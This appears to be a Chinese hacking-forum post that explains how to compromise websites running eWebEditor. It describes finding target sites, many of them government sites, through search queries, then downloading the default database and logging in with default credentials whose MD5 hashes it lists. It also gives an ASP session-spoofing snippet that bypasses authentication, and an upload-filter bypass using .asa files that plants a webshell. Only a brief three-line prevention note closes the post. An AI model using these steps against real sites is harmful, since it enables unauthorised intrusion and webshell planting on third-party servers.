今天群里一新面孔问WEBEDIT后台如何抓webshell,我叫他百度一下,说这是老东西了应该文章不少.他说没找到叫我告诉他,汗之,简单爬几笔吧-Amxking 通常在GOOGLE或者利用挖掘鸡 搜索关键词 eWebEditor 或/ewebeditor/db/ewebeditor.mdb 就可以找到很多使用eWebEditor的网站,政府站居多~! 第一种利用下载默认数据库获得帐户及密码进后台: http://www.网站.com/ewebeditor/db/ewebeditor.mdb 默认数据库所在位置 eWebEditor_System sys_UserName sys_UserPass sys_Version sys_ReleaseDate sys_License 7a57a5a743894a0e 7a57a5a743894a0e 2.8.0 2004-07-06 该表为管理帐户及密码所在表↑ 常见默认帐户密码:admin admin (MD5加密后是:7a57a5a743894a0e) 常识:admin 的加密代码: 16位加密:7a57a5a743894a0e 32位加密:21232f297a57a5a743894a0e4a801fc3 admin888的MD5加密码 16位:469e80d32c0559f8 32位加密:7fef6171469e80d32c0559f88b377245 另一种方法是利用WebEditor session欺骗漏洞,进入后台: 漏洞文件:Admin_Private.asp 漏洞语句:<% If Session("eWebEditor_User") = "" Then Response.Redirect "admin_login.asp" Response.End End If 只判断了session,没有判断cookies和路径的验证问题。 漏洞利用: 新建一个amxking.asp内容如下: <%Session("eWebEditor_User") = "11111111"%> 访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp 第三种方法就是社会工程学(Social Engineering)猜测帐户及密码了,这里不多说了. http://www.网站.com/ewebeditor/admin_login.asp 默认后台登陆界面 当我们进入后台后,展开 "样式管理"栏目→新增样式→图片类型中添加asa(即使程序允许上传asa类型文件,这里不要改为asp,因为即使你改为asp,在上传asp类文件时也会被禁止过滤掉,看看其程序你就明白了.) eWebEditor目录下的Upload.asp文件,有一个极为幼稚的错误,即对于文件过滤只是通过sAllowExt=Replace(UCase(sAllowExt), "ASP", "")来禁止上传asp文件,却未过滤asa、cer等文件,所以给我们创造了机会. 修改完类型后,提交我们建立的新样式.然后预览,上传 马.asa ,copy马的地址,在浏览器里提交浏览即可. 防范入侵: 修改admin_login.asp 后台登陆界面程序名称...... 修改默认数据库ewebeditor/db/ewebeditor.mdb地址...... 禁止更改添加新样式...... |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-9-29 13:31 , Processed in 0.207367 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.